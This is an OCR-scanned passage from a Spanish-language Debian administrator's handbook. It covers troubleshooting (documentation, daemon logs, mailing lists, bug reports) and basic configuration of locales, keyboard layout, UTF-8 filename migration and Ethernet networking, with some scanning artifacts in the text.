be  leer  lo  que  el  encargado  del  paquete  ha  documentado.  Leer  el  archivo  /usr/share/ 
do c/paquete/ README .  Debian  le  permitira  aprender  sobre  las  medidas  especificas  tomadas  pa¬ 
ra  simplificar  el  uso  del  software.  A  veces  es  esencial  para  poder  entender  las  diferencias  con  el 
comportamiento  original  del  programa  segtin  describe  la  documentacion  en  general  como  los 
«howto».  A  veces  este  archivo  tambien  detalla  los  errores  mas  comunes  para  que  pueda  evitar 
desperdiciar  tiempo  en  problemas  comunes. 

Luego  deberfa  revisar  la  documentacion  oficial  del  software  —  revise  Seccion  7.1,  «Fuentes  de 
documentacion»  pagina  142  para  identificar  las  diferentes  fuentes  de  documentacion  existentes. 
La  orden  dp  kg  -  L  paquete  provee  una  lista  de  los  archivos  incluidos  en  el  paquete;  puede  asi 
identificar  rapidamente  la  documentacion  disponible  (asi  como  tambien  los  archivos  de  confi¬ 
guration  ubicados  en  /etc/),  dpkg  -s  paquete  muestralos  metadatas  del  paquete  y  cualquier 
paquete  recomendado  o  sugerido;  alii  podra  encontrar  documentacion  o  una  herramienta  que 
facilitara  la  configuration  del  software. 

Por  ultimo,  los  archivos  de  configuration  usualmente  estan  autodocumentados  con  muchos  co- 
mentarios  explicativos  que  detallan  los  varios  valores  posibles  para  cada  parametro  de  confi¬ 
guration.  Tanto  es  asi  que  a  veces  basta  elegir  una  linea  a  activar  entre  las  disponibles.  En 
algunos  casos  se  proveen  archivos  de  configuration  de  ejemplo  en  el  directorio  /usr/share/ 
doc/ paquete/ examples/ .  Le  pueden  servir  como  base  para  su  propio  archivo  de  configuration. 

NORMATIVA  DEBIAN  Todos  los  ejemplos  deben  instalarse  en  el  directorio  /usr/share/ 
Ubicacion  de  los  doc/papuete/examples/.  Estos  pueden  ser  archivos  de  configuracion,  co- 
ejemplos  digo  fuerde  de  programas  (un  ejemplo  de  uso  de  una  biblioteca)  o  un  script  de 
conversion  de  datos  que  el  administrador  puede  utilizar  en  algunos  casos  (como  pa¬ 
ra  inicializar  una  base  de  datos).  Si  el  ejemplo  es  especifico  a  una  arquitectura  debe 
instalarse  en  /usr/lib/papuete/examples/  y  debe  haber  un  enlace  apuntando 
a  dicho  archivo  en  el  directorio  /usr/share/doc/papuete/examples/. 
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7.2.2  Monitorizacion  de  lo  que  hacen  los  demonios 

Entender  que  es  lo  que  hace  un  demonio  es  algo  mas  complicado,  ya  que  no  interactua  direc- 
tamente  con  el  administrador.  Para  revisar  si  el  demonio  esta  trabajando  realmente  necesita 
probarlo.  Por  ejemplo,  para  verificar  el  demonio  Apache  (servidor  web),  pruebelo  con  un  pedi- 
do  HTTP. 

Para  permitir  dichas  pruebas  cada  demonio  generalmente  graba  todo  lo  que  hace  asf  como  tam- 
bien  los  errores  que  encuentra  en  lo  que  se  llaman  «archivos  de  registro»  o  «registros  de  sis- 
tema».  Los  registros  se  almacenan  en  /var/log/  o  alguno  de  sus  subdirectories.  Para  saber  el 
nombre  exacto  del  archivo  de  registro  de  cada  demonio  revise  su  documentacion.  Note  que  una 
sola  prueba  no  siempre  es  suficiente  si  no  cubre  todos  los  casos  de  uso  posibles;  algunos  proble- 
mas  solo  ocurren  en  circunstancias  particulares. 


HERRAMIENTA  rsyslogd  es  especial:  recolecta  registros  (mensajes  internos  del  sistema)  que  otros 
El  demonio  rsyslogd  programas  le  envi'an.  Cada  entrada  de  registro  esta  asociada  con  un  subsistema 
(correo,  nucleo,  autenticacion,  etc.)  y  una  prioridad;  rsyslogd  procesa  estas  dos 
porciones  de  informacion  para  decidir  que  hacer.  El  mensaje  de  registro  puede  ser 
guardado  en  varios  archivos  de  registro  y/o  ser  enviado  a  la  consola  de  administra- 
cion.  Puede  definir  los  detalles  en  el  archivo  de  configuracion  /etc/rsyslog  .  conf 
(documentado  en  la  pagina  de  manual  del  mismo  nombre). 

Algunas  funciones  de  C,  especializadas  en  enviar  registros,  simplifican  el  uso  del 
demonio  rsyslogd.  Sin  embargo,  algunos  demonios  gestionan  sus  propios  archivos 
de  registro  (este  es  el  caso  de,  por  ejemplo,  samba  que  implementa  en  Linux  los 
recursos  compartidos  de  Windows). 

Tenga  en  cuenta  que  cuando  se  utiliza  systemd,  los  registros  se  recoger  por  systemd 
antes  de  ser  reenviados  a  rsyslogd.  Por  lo  tanto  tambien  estan  disponibles  a  traves 
del  historial  (’’journal”)  de  systemd  y  puden  ser  consultados  mediante  j  ou  rnalctl 
(vea  Seccion  9.1.1,  «EI  sistema  de  inicio  systemd»  pagina  195  para  mas  detalles). 


VOLVER  A  LOS  CIMIENTOS  Un  demonio  es  un  programa  que  no  es  invocado  explicitamente  por  el  usuario  y  se 
Demonio  mantiene  en  segundo  piano  esperando  que  se  cumpla  cierta  condicion  para  realizar 
una  tarea.  Muchos  programas  de  servidor  son  demonios,  un  termino  que  explica 
que  la  letra  «d»  aparezcafrecuentemente  al  final  de  su  nombre  (sshd,  smtpd,  httpd, 
etc.). 


A  modo  de  operacion  preventiva,  el  administrador  deberia  leer  de  forma  regular  los  registros 
mas  relevantes  del  servidor.  Puede  asf  diagnosticar  problemas  antes  que  sean  reportados  por 
usuarios  molestos.  Los  usuarios  a  veces  esperaran  que  un  problema  ocurra  repetidamente  en 
varios  dfas  antes  de  reportarlo.  En  muchos  caso,  existen  herramientas  especificas  para  analizar 
el  contenido  de  archivos  de  registros  extensos.  En  particular,  existen  para  servidores  web  (como 
por  ejemplo  analog,  awstats,  webalizer  para  Apache),  para  servidores  FTP,  para  servidores 
proxy/cache,  para  firewalls,  para  servidores  de  correo,  para  servidores  DNS  e  inclusive  para 
servidores  de  impresion.  Algunas  de  estas  herramientas  funcionan  de  forma  modular  y  permiten 
analizar  varios  tipos  de  archivos  de  registro.  Este  es  el  caso  de  lire.  Otras  herramientas,  como 
logcheck  (un  software  que  discutimos  en  el  Capitulo  14:  «Seguridad»  pagina  398),  escanean 
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estos  archivos  para  buscar  alertas  a  tratar. 


7.2.3  Pedido  de  ayuda  en  una  lista  de  correo 

Si  sus  busquedas  no  le  ayudaron  a  encontrar  la  rafz  de  un  problema  es  posible  conseguir  ayu¬ 
da  de  otras  personas,  tal  vez  mas  experimentadas.  Este  es  exactamente  el  proposito  de  la  lista 
de  correo  debian-users@lists.debian.org.  Como  con  cualquier  comunidad,  tiene  reglas  que  debe 
seguir.  Antes  de  hacer  cualquier  pregunta  debe  revisar  si  su  problema  ya  fue  tratado  en  discu- 
siones  recientes  en  la  lista  o  por  cualquier  documentacion  oficial. 

https : //wiki .debian . org/DebianMailing Lists 

+  https : //lists .debian . org/debian- user/ 


SUGERENCIA  Para  listas  de  correo  de  alto  volumen,  como  debian-user@lists.debian.org  puede  ser 
Leer  una  lista  en  la  web  util  navegarlas  como  un  foro  de  discusion  (o  grupo  de  noticias).  Gmane.org  permite 

consultar  las  listas  de  Debian  en  este  formato.  La  lista  mencionada  anteriormente 
esta  disponible  en: 

•-  http://dir. gmane . org/gmane . Linux . debian .user 


VOLVER  A  LOS  CIMIENTOS  En  general,  para  toda  correspondencia  en  listas  de  correo  se  debe  seguir  las  reglas 

Aplica  la  «netiqueta»  de  «netiqueta».  Este  termino  se  refiere  a  un  conjunto  de  reglas  de  sentido  comun 

desde  cortesias  comunes  a  errores  que  se  deben  evitar. 

»-  http://tools. ietf . org/html/rf cl855 

Mas  aun,  en  cualquier  canal  de  comunicacion  gestionado  por  el  proyecto  Debian, 
se  esta  sujeto  al  Codigo  de  Conducta  de  Debian: 

•-  https : //www. debian . org/code_of  conduct 


Una  vez  que  se  han  cumplido  estas  dos  condiciones  puede  pensar  en  describir  su  problema  a 
la  lista  de  correo.  Incluya  tanta  informacion  relevante  como  le  sea  posible:  pruebas  realizadas, 
documentacion  consultada,  como  intento  diagnosticar  el  problema,  los  paquetes  en  cuestion  o 
que  puedan  estar  involucrados,  etc.  Revise  el  Sistema  de  seguimiento  de  errores  de  Debian  (BTS, 
descripto  en  el  recuadro  «Sistema  de  seguimiento  de  errores»  pagina  16)  por  problemas  simila- 
res  y  mencione  el  resultado  de  dicha  busqueda  proveyendo  enlaces  a  los  errores  encontrados. 
El  BTS  comienza  en: 

http : //www. debian . org/Bugs/index . html 

Mientras  mas  cortes  y  preciso  sea,  mayor  sera  la  posibilidad  de  obtener  una  respuesta  o,  al  me- 
nos,  algunos  elementos  de  respuesta.  Si  recibe  informacion  relevante  por  privado,  considere 
resumir  esta  informacion  publicamente  para  que  otros  se  beneficien.  Esto  permite  que  los  ar¬ 
chivos  de  la  lista,  que  son  buscados  por  varios  motores  de  busqueda,  muestren  la  resolucion  a 
otros  que  pueden  tener  la  misma  pregunta. 
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7.2.4  Reporte  de  un  error  cuando  un  problema  es  demasiado  dificil 

Si  fallan  todos  sus  esfuerzos  de  resolver  un  problema  es  posible  que  dicha  resolucion  no  sea  su 
responsabilidad  y  que  el  problema  se  deba  a  un  error  en  el  programa.  En  este  caso,  el  proce- 
dimiento  adecuado  es  reportar  el  error  a  Debian  o  directamente  a  los  autores  originales.  Para 
hacerlo,  aisle  el  problema  tanto  como  sea  posible  y  cree  una  situacion  de  pruebas  minima  en  la 
que  se  lo  pueda  reproducir.  Si  conoce  que  programa  es  el  aparente  culpable  del  problema  puede 
encontrar  el  paquete  al  que  corresponde  con  dpkg  -S  archivo  en  cuestion.  Revise  el  Siste- 
ma  de  seguimiento  de  errores  (https://bugs.debian.org/pnquefe)  para  asegurarse  que  el  error 
no  fue  reportado  anteriormente.  Luego  puede  enviar  su  propio  reporte  de  error  utilizando  la 
herramienta  reportbug  incluyendo  tanta  informacion  como  le  sea  posible,  especialmente  una 
descripcion  completa  de  los  casos  de  prueba  minimos  que  le  permitiran  a  cualquiera  reproducir 
el  error. 

Los  elementos  de  este  capitulo  son  un  medio  de  resolver  efectivamente  los  inconvenientes  con 
los  que  se  puede  encontrar  en  los  proximos  capitulos.  jUtilicelos  siempre  que  lo  necesite! 
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El  proposito  de  un  equipo  con  una  instalacion  nueva  creada  con  debian-  installer  es  que  sea  tan 
funcional  como  sea  posible,  pero  arm  necesita  configurar  muchos  servicios.  Lo  que  es  mas,  es  bueno  saber 
como  modificar  ciertos  elementos  de  configuracion  definidos  durante  el  proceso  de  instalacion  inicial. 


Este  capitulo  revisa  todo  lo  incluido  en  lo  que  llamariamos  «configuracion  basica»:  red,  idioma 
y  locales,  usuarios  y  grupos,  impresion,  puntos  de  montaje,  etc. 


8.1.  Configuracion  del  sistema  en  otro  idioma 

Si  instalo  el  sistema  utilizando  el  idioma  frances,  el  equipo  probablemente  ya  tenga  configura- 
do  al  frances  como  idioma  predeterminado.  Pero  es  bueno  saber  lo  que  realiza  el  instalador  al 
configurar  el  idioma  para  que,  luego  si  lo  necesita,  pueda  cambiarlo. 


HERRAMIENTA 

El  programa  locale  para 
mostrar  la  configuracion 
actual 


El  programa  locale  mostrara  un  resumen  de  la  configuracion  actual  de  varios  pa¬ 
rametros  de  la  locale  (formato  de  fecha,  formato  de  numeros,  etc.)  presentados  en 
forma  de  un  grupo  de  variables  de  entorno  estandar  dedicadas  a  la  modificacion 
dinamica  de  estas  configuraciones. 


8.1.1  Configuracion  del  idioma  predeterminado 

Un  locale  es  un  grupo  de  configuraciones  regionales.  Incluyen  no  solo  el  idioma  para  el  texto, 
tambien  el  formato  para  mostrar  numeros,  fechas,  marcas  temporales  y  cantidades  de  dinero  asi 
como  tambien  reglas  de  comparacion  alfabetica  (para  considerar  caracteres  acentuados  correc- 
tamente).  Aunque  puede  especificar  cada  uno  de  estos  parametros  independientemente  de  los 
demas,  generalmente  utilizaremos  un  locale  que  es  un  conjunto  coherente  de  valores  para  estos 
parametros  que  corresponde  con  una  «region»  en  el  sentido  amplio  de  la  palabra.  Generalmen¬ 
te  se  indican  los  locales  en  la  forma  codigo-idiomaCODIGO-PAIS,  a  veces  con  un  sufijo  que 
indica  un  conjunto  de  caracteres  y  codificacion  a  utilizar.  Esto  permite  considerar  diferencias 
idiomaticas  o  tipograficas  entre  diferentes  regiones  con  un  idioma  en  comun. 


CULTURA  Historicamente,  cada  locale  tiene  asociado  un  «conjunto  de  caracteres»  (grupo  de 
Juegos  de  caracteres  caracteres  conocidos)  y  una  «codificacion»  preferida  (representacion  interna  de  los 
caracteres  para  el  equipo). 

Las  codificaciones  mas  populares  para  idiomas  derivados  del  latfn  estaban  limita- 
das  a  256  caracteres  porque  decidieron  utilizar  solo  un  byte  por  caracter.  Debido  a 
que  256  caracteres  no  son  suficientes  para  cubrir  todos  los  idiomas  europeos  fueron 
necesarias  multiples  codificaciones,  y  asi  es  como  tenemos  desde  ISO-8859-1  (tam¬ 
bien  conocida  como  «Latin  1»)  hasta  ISO-8859-15  (tambien  conocida  como  «Latin 
9»),  entre  otras. 

Trabajar  con  idiomas  extranjeros  generalmente  implica  cambios  frecuentes  entre 
varias  codificaciones  y  conjuntos  de  caracteres.  Lo  que  es  mas,  escribir  documentos 
en  varios  idiomas  causo  problemas  mas  grandes  y  casi  intratables.  Se  creo  Unicode 
(un  supercatalogo  de  casi  todos  los  sistemas  de  escritura  de  todos  los  idiomas  del 
mundo)  para  evitar  este  problema.  Una  de  las  codificaciones  de  Unicode,  UTF-8, 
mantiene  todos  los  128  simbolos  ASCII  (codigos  de  7  bits),  pero  maneja  los  demas 
caracteres  de  forma  diferente.  Estos  son  precedidos  por  una  secuencia  «escape»  de 
unos  pocos  bits,  que  define  implicitamente  la  longitud  del  caracter.  Esto  permite 
codificar  todos  los  caracteres  Unicode  en  una  secuencia  de  uno  o  mas  bytes.  Se 
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popularizo  su  uso  debido  a  que  es  la  codificacion  predeterminada  en  documentos 
XML. 

Generalmente  esta  es  la  codificacion  que  deberfa  utilizar  y  es,  por  lo  tanto,  la  pre¬ 
determinada  en  sistemas  Debian. 


El  paquete  locales  incluye  todos  los  elementos  necesarios  para  que  la  «localizacion»  de  las  apli- 
caciones  funcione  correctamente.  Durante  su  instalacion,  este  paquete  le  pedira  que  seleccione 
un  conjunto  de  idiomas  compatibles.  Puede  cambiar  este  conjunto  en  cualquier  momento  eje- 
cutando  como  rootdpkg-  reconfigure  locales. 

La  primer  pregunta  le  pedira  que  seleccione  las  «locales»  a  incluir.  Seleccionar  todas  las  locales 
de  ingles  (es  decir  todas  las  que  comiencen  con  «en_»)  es  una  eleccion  razonable.  No  dude  en 
habilitar  otras  locales  si  la  maquina  va  a  ser  utilizada  por  usuarios  extranjeros.  Se  almacenara  la 
lista  de  locales  activadas  para  el  sistema  en  el  archivo  /etc/locale .  gen.  Es  posible  editar  este 
archivo  a mano  pero  deberfa ej ecutar  locale-gen  luego  de  cualquier  modificacion.  Generara los 
archivos  necesarios  para  que  funcionen  las  locales  agregadas  y  eliminara  archivos  obsoletos. 

La  segunda  pregunta,  titulada  « Locale  predeterminada  para  el  entorno  del  sistema»,  pedira  un 
locale  predeterminado.  La  opcion  recomendada  en  Estados  Unidos  es  «en_US.UTF-8».  Los  anglo- 
parlantes  britanicos  preferiran  «en_GB.UTF-8»  y  los  canadienses  preferiran  «en_CA.UTF-8»  o 
el  frances  «fr_CA.UTF-8».  Se  modificara  el  archivo  /etc/default/locale  para  almacenar  esta 
eleccion.  Desde  ese  momento,  todas  las  sesiones  de  usuario  estaran  al  tanto  del  cambio  ya  que 
PAM  agregara  su  contenido  en  la  variable  de  entorno  LANG.  (N.T.  los  castellanoparlantes  segura- 
mente  preferiran  «es_XX.UTF-8»,  donde  XX  representa  el  codigo  ISO  del  pais,  como  es_ES  para 
Espana  o  es_AR  para  Argentina) 


tras  bambalinas  El  archivo  /etc/environment  provee  a  los  programas  login,  gdm  o  inclusive  ssh 
/etc/environment  y  /etc/  'as  variables  de  entorno  correctas  a  crear. 

default/locale  Estas  aplicaciones  no  crean  estas  variables  directamente  sino  que  lo  hacen  a  tra- 
ves  de  un  modulo  PAM  (pam  env .  so).  PAM  (siglas  de  «modulo  de  autenticacion 
conectable»:  «Pluggable  Authentication  Module»)  es  una  biblioteca  modular  que 
centraliza  los  mecanismos  de  autenticacion,  inicializacion  de  la  sesion  y  gestion  de 
contrasehas.  Revise  la  Seccion  11.7.3.2,  «Configuracion  de  PAM»  pagina  307  para 
encontrar  un  ejemplo  de  configuracion  de  PAM. 

El  archivo  /etc/default/locale  funciona  de  manera  similar  pero  solo  contiene 
la  variable  de  entorno  LANG.  Gracias  a  esta  division,  algunos  usuarios  PAM  pue- 
den  heredar  un  entorno  completo  sin  localizacion.  De  hecho,  generalmente  no  se 
recomienda  ejecutar  programas  de  servidor  con  localizacion  activada;  por  el  con- 
trario,  se  recomienda  utilizar  las  configuraciones  regionales  y  de  localizacion  para 
los  programas  que  abren  sesiones  de  usuario. 


8.1.2.  Configuracion  del  teclado 

Aun  cuando  se  gestiona  la  distribucion  del  teclado  de  formas  diferentes  en  una  consola  y  en  el 
modo  grafico,  Debian  ofrece  una  interfaz  de  configuracion  unica  que  funciona  para  ambos:  esta 


Capitulo  8  —  Configuracion  basica:  red,  cuentas,  impresion... 


155 


basada  en  debconfy  la  implementa  el  paquete  keyboard-configuration.  Por  lo  tanto,  puede  ejecutar 
dpkg-  reconfigure  keyboard -configuration  para  establecer  la  distribucion  de  teclado. 

Las  preguntas  son  relevantes  para  la  distribucion  fisica  del  teclado  (un  teclado  de  PC  estandar  en 
los  Estados  Unidos  seria  «Generico  104  Teclas»),  luego  la  distribucion  a  utilizar  (generalmente 
«US»),  y  luego  la  posicion  de  la  tecla  AltGr  (Alt  derecho).  Finalmente  pregunta  por  la  tecla  a  uti¬ 
lizar  para  «Compose»  que  permite  ingresar  caracteres  especiales  combinando  teclas.  Presionar 
sucesivamente  Compose  ’  e  creara  una  e  acentuada  («e»).  Se  describen  todas  estas  combina- 
ciones  en  el  archivo  /usr/share/Xll/locale/en_US .  UTF-  8/Compose  (u  otro  archivo  segun  el 
locale  actual  indicado  por  /usr/share/Xll/locale/compose  .dir). 

La  configuration  de  teclado  para  el  modo  grafico  aquf  descripta  solo  afecta  la  distribucion  pre- 
determinada;  los  entornos  GNOME  y  KDE,  entre  otros,  proveen  un  panel  de  control  de  teclado 
entre  sus  preferencias  que  le  permite  a  cada  usuario  tener  su  propia  configuration.  Estos  paneles 
de  control  tambien  proveen  algunas  opciones  adicionales  sobre  el  comportamiento  de  algunas 
teclas  particulares. 


8.1.3  Migracion  a  UTF-8 

La  generalization  de  la  codificacion  UTF-8  es  una  solucion  muy  esperada  a  varias  dificultades  de 
interoperabilidad  ya  que  facilita  intercambios  internacionales  y  elimina  los  Hmites  arbitrarios 
de  los  caracteres  que  pueden  ser  utilizados  en  un  documento.  La  unica  desventaja  es  que  ha  teni- 
do  que  pasar  por  una  etapa  de  transicion  dificil.  Como  no  puede  ser  completamente  transparente 
(es  decir,  no  puede  suceder  al  mismo  tiempo  en  todo  el  mundo),  se  necesitaron  dos  operaciones 
de  conversion:  una  en  el  contenido  de  los  archivos  y  otra  en  los  nombres  de  archivos.  Afortu- 
nadamente,  ya  se  completo  la  mayor  parte  de  esta  migracion  y  la  discutimos  mayormente  por 
cuestiones  de  referencia. 


CULTURA  Cuando  se  envia  (o  almacena)  un  texto  sin  informacion  de  codificacion  el  receptor 
Mojibake  y  los  errores  de  110  siemPre  puede  estar  seguro  de  saber  que  convencion  utilizar  para  determinar  el 

interpretation  significado  de  un  conjunto  de  bytes.  Usualmente  puede  tener  una  idea  obteniendo 
estadfsticas  en  la  distribucion  de  los  valores  presentes  en  el  texto  pero  esto  no  siem- 
pre  da  una  respuesta  definitiva.  Cuando  el  sistema  de  codificacion  elegido  para  la 
lectura  es  diferente  al  utilizado  para  escribir  el  archivo  se  interpretan  incorrecta- 
mente  los  bytes  y  se  obtienen,  en  el  mejor  caso,  errores  en  algunos  caracteres  o,  en 
el  peor  caso,  algo  completamente  ilegible. 

Por  lo  tanto,  si  un  texto  en  frances  aparece  normal  con  la  excepcion  de  letras  acen- 
tuadas  y  algunos  simbolos  que  apareceran  reemplazados  con  secuencias  de  caracte¬ 
res  como  «A©»  o  «A"»  o  «A§»  probablemente  sea  un  archivo  codificado  con  UTF-8 
interpretado  como  ISO-8859-1  o  ISO-8859-15.  Este  es  signo  de  una  instalacion  local 
que  no  migro  a  UTF-8  aun.  Si,  en  cambio,  observa  si'gnos  de  interrogacion  en  lugar 
de  letras  acentuadas  —  aun  si  dichos  simbolos  parecen  reemplazar  el  caracter  que 
seguirfa  a  la  letra  acentuada  —  es  probable  que  su  instalacion  ya  este  configurada 
para  UTF-8  y  que  le  enviaron  un  documento  codificado  con  Western  ISO. 

Esos  son  todos  los  casos  «simples».  Estos  casos  solo  aparecen  en  la  cultura  occi¬ 
dental  ya  que  se  diseno  Unicode  (y  UTF-8)  para  maximizar  los  puntos  comunes 
con  codificaciones  historicas  de  idiomas  occidentales  basados  en  el  alfabeto  latino 
que  permite  reconocer  partes  del  texto  aun  cuando  faltan  algunos  caracteres. 
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En  configuraciones  mas  complejas  que,  por  ejemplo,  involucran  dos  entornos  que 
corresponden  a  dos  idiomas  diferentes  que  no  utilizan  el  mismo  alfabeto  general- 
mente  obtendra  resultados  completamente  ilegibles  —  una  serie  de  si'mbolos  abs¬ 
tracts  que  no  tienen  nada  que  ver  unos  con  otros.  Esto  es  especialmente  frecuente 
con  idiomas  asiaticos  debido  a  sus  numerosos  idiomas  y  sistemas  de  escritura.  Se 
adopto  la  palabra  japonesa  mojibake  para  describir  este  fenomeno.  Cuando  ocurre, 
el  diagnostico  es  mas  complejo  y  la  solucion  mas  simple  generalmente  es  migrar  a 
UTF-8  en  ambos  lados. 


En  cuanto  a  los  nombres  de  archivos,  la  migracion  puede  ser  relativamente  simple.  Se  creo  la 
herramienta  convmv  (en  el  paquete  del  mismo  nombre)  especificamente  con  este  proposito;  per- 
mite  cambiar  el  nombre  de  los  archivos  de  una  codificacion  a  otra.  El  uso  de  esta  herramienta 
es  relativamente  simple  pero  recomendamos  realizarlo  en  dos  pasos  para  evitar  sorpresas.  El 
proximo  ejemplo  muestra  un  entorno  UTF-8  que  contiene  nombres  de  directorio  codificados  en 
ISO-8859-15  y  utiliza  convmv  para  cambiarlos. 


$  Is  trabajo/ 

?conos  Elementos  gr?ficos  Textos 

$  convmv  -r  -f  iso-8859-15  -t  utf-8  trabajo/ 

Starting  a  dry  run  without  changes... 

mv  "t rabaj o/Elementos  graficos"  "trabajo/Elementos  graficos" 

mv  "t rabaj o/^conos"  "trabajo/Iconos" 

No  changes  to  your  files  done.  Use  --notest  to  finally  rename  the  files. 
$  convmv  -r  --notest  -f  iso-8859-15  -t  utf-8  trabajo/ 

mv  "trabajo/Elementos  graficos"  "trabajo/Elementos  graficos" 

mv  "trabajo/Iconos"  "trabajo/Iconos" 

Ready ! 

$  Is  trabajo/ 

Elementos  graficos  Iconos  Textos 


Para  el  contenido  de  los  archivos,  los  procedimientos  de  conversion  son  mas  complejos  debido 
a  la  cantidad  de  formatos  de  archivo  existentes.  Algunos  formatos  de  archivos  incluyen  infor- 
macion  de  codificacion  que  facilita  las  tareas  al  software  con  el  que  se  los  trata;  es  suficiente 
entonces  abrir  estos  archivos  y  volver  a  guardarlos  especificando  la  condificacion  UTF-8.  En 
otros  casos,  debe  especificar  la  codificacion  original  al  abrir  el  archivo  (ISO-8859-1  o  «Western», 
o  ISO-8859-15  o  «Western  (Euro)»  segun  el  caso). 

Para  archivos  de  texto  simples  puede  utilizar  recode  (en  el  paquete  del  mismo  nombre)  que 
permite  recodificacion  automatica.  Esta  herramienta  tiene  numerosas  opciones  que  le  permiten 
alterar  su  comportamiento.  Le  recomendamos  consultar  la  documentacion,  la  pagina  de  manual 
recode  (1)  o  la  pagina  info  recode  (mas  completa). 
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8.2.  Configuracion  de  red 


VOLVER  A  LOS  CIMIENTOS 

Conceptos  de  red 
esenciales  (Ethernet, 
direccion  IP,  subred, 
difusion) 


La  mayoria  de  las  redes  modernas  locales  utilizan  el  protocolo  Ethernet,  en  el  que  se 
dividen  los  datos  en  pequenos  bloques  llamados  tramas  («frames»)  y  se  transmite 
en  el  cable  una  trama  a  la  vez.  La  velocidad  de  datos  varia  desde  10  Mb/s  en  tarjetas 
Ethernet  antiguas  hasta  10  Gb/s  en  las  tarjetas  mas  recientes  (la  tasa  mas  comun 
esta  creciendo  actualmente  de  100  Mb/s  a  1  Gb/s).  Los  cables  mas  utilizados  son 
llamados  10BASE-T,  100BASE-T,  1000BASE-T  o  10GBASE-T  segun  el  rendimiento 
que  pueden  proveer  de  forma  confiable  (la  letra  T  es  por  «par  trenzado»,  «twis- 
ted  pair»  en  ingles);  estos  cables  finalizan  en  un  conector  RJ45.  Hay  otros  tipos  de 
cables,  generalmente  utilizados  para  velocidades  de  1  Gb/s  en  adelante. 


Una  direccion  IP  es  un  numero  utilizado  para  identificar  una  interfaz  de  red  de 
un  equipo  en  una  red  local  o  Internet.  En  la  version  de  IP  mas  utilizada  actual¬ 
mente  (IPv4)  se  codifica  este  numero  en  32  bits  y  generalmente  se  lo  representa 
por  4  numeros  separados  por  puntos  (por  ejemplo:  192.168.0.1),  cada  numero 
entre  0  y  255  (inclusive,  correspondiendo  a  8  bits  de  datos).  La  siguiente  version 
del  protocolo,  IPv6,  extiende  este  espacio  de  direcciones  a  128  bits  y  las  direcciones 
se  representan  generalmente  por  una  serie  de  numeros  hexadecimales  separados 
por  dos  puntos  (por  ejemplo:  2001:0db8:13bb:0002:0000:0000:0000:0020  o  su  version 
corta  2001:db8:13bb:2::20). 


Una  mascara  de  subred  (mascara  de  red)  define  en  su  codigo  binario  que  porcion 
de  una  direccion  IP  corresponde  a  la  red,  el  resto  especifica  el  equipo.  En  el  ejemplo 
de  configuracion  de  una  direccion  IPv4  estatica  dado,  la  mascara  de  red  255 . 255  . 
255.0  (24  «l»s  seguidos  de  8  «0»s  en  su  representacion  binaria)  indica  que  los 
primeros  24  bits  de  la  direccion  IP  corresponden  a  la  direccion  de  red  y  los  otros 
8  son  especificos  a  la  maquina.  En  IPv6,  para  facilitar  la  lectura,  solo  se  expresa  la 
cantidad  de  «l»s;  la  mascara  de  red  para  una  red  IPv6  podrfa  ser  entonces  64. 

La  direccion  de  red  es  una  direccion  IP  en  la  que  la  parte  que  describe  el  numero 
de  equipo  es  0.  Generalmente  se  indica  el  rango  de  direcciones  IPv4  en  una  red 
completa  con  la  sintaxis  a.b.c.d/e  en  el  que  a.b.c.d  es  la  direccion  de  red  y  e  es  la 
cantidad  de  bits  afectados  por  la  parte  de  red  en  una  direccion  IP.  La  red  de  ejemplo 
entonces  podria  escribirse:  192 . 168 . 0 . 0/24.  La  sintaxis  es  similar  en  IPv6:  2001 : 
db8 : 13bb  :  2  :  :/64. 


Un  enrutador  («router»)  es  una  maquina  que  conecta  varias  redes  entre  si.  Se  guia 
todo  el  trafico  a  traves  de  un  enrutador  a  la  red  correcta.  Para  hacerlo,  el  enrutador 
analiza  los  paquetes  entrantes  y  los  redirecciona  segun  su  direccion  IP  de  destino. 
Generalmente  se  conoce  al  enrutador  como  puerta  de  enlace  («gateway»);  en  esta 
configuracion  trabaja  como  una  maquina  que  ayuda  a  alcanzar  el  exterior  de  la  red 
local  (hacia  una  red  extendida,  como  Internet). 

La  direccion  especial  de  difusion  conecta  todas  las  estaciones  en  una  red.  Casi  nun- 
ca  es  «enrutada»,  solo  funciona  en  la  red  en  cuestion.  Especificamente,  significa 
que  un  paquete  de  datos  direccionado  a  difusion  nunca  pasara  a  traves  del  enruta¬ 
dor. 


Este  capitulo  se  enfocara  en  direcciones  IPv4  ya  que  son  las  utilizadas  mas  comun- 
mente  en  la  actualidad.  Se  estudiaran  los  detalles  del  protocolo  IPv6  en  la  Seccion 
10.5,  «!Pv6»  pagina  252  pero  los  conceptos  se  mantienen. 


Debido  a  que  se  configura  automaticamente  la  red  durante  la  instalacion  inicial,  el  archivo  /et  c/ 
network/interfaces  ya  contiene  una  configuracion  valida.  Una  linea  que  comienza  con  auto 
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provee  una  lista  de  las  interfaces  a  configurar  automaticamente  durante  el  arranque  utilizando 
ifupdown y  su script  de  inicio  /etc/init  .d/networking.  Estas  generalmente  incluyen  ethO  que 
se  refiere  a  la  primera  tarjeta  Ethernet. 


ALTERNATIVA 

NetworkManager 


Se  recomienda  particularmente  Network  Manager  en  configuraciones  errantes  (re¬ 
vise  la  Seccion  8.2.4,  «Configuracion  de  red  automatica  para  usuarios  itineran- 
tes»  pagina  162,  pero  tambien  es  perfectamente  util  como  herramienta  de  ges- 
tion  de  red  predeterminada.  Puede  crear  «conexiones  de  sistema»  que  seran  uti- 
lizadas  tan  pronto  como  inicie  el  equipo  tanto  con  un  archivo  de  estilo  .ini  en 
/etc/ NetworkManager/ system-  connections/  o  a  traves  de  una  herramienta  gra- 
fica  (nm-connection-editor).  Solo  recuerde  desactivar  todos  los  elementos  de 
/etc/network/interfaces  si  desea  que  los  gestione  Network  Manager. 


•-  https : //wiki .gnome . org/ Project s/NetworkManage r/Sy stemSetting s/ 
jessie 


•-  https : //developer . gnome . org/NetworkManager/0 . 9/ ref  -  settings . 
html 


8.2.1.  Interfaz  Ethernet 

Si  el  equipo  tienen  una  tarjeta  Ethernet,  se  debe  configurar  la  red  IP  a  la  que  esta  asociada  eligien- 
do  uno  de  dos  metodos  posibles.  El  metodo  mas  simple  es  utilizar  una  configuracion  dinamica 
con  DHCP,  lo  que  necesita  un  servidor  DHCP  en  la  red  local.  Puede  indicar  un  nombre  de  equipo 
deseado  que  corresponde  a  la  configuracion  hostname  en  el  ejemplo  a  continuacion.  El  servidor 
DHCP  luego  envi'a  la  configuracion  para  la  red  apropiada. 


Ejemplo  8.1  Configuracion  DHCP 


auto  ethO 

iface  ethO  inet  dhcp 
hostname  arrakis 


Una  configuracion  «estatica»  debe  indicar  especificamente  los  parametros  de  red.  Esto  incluye 
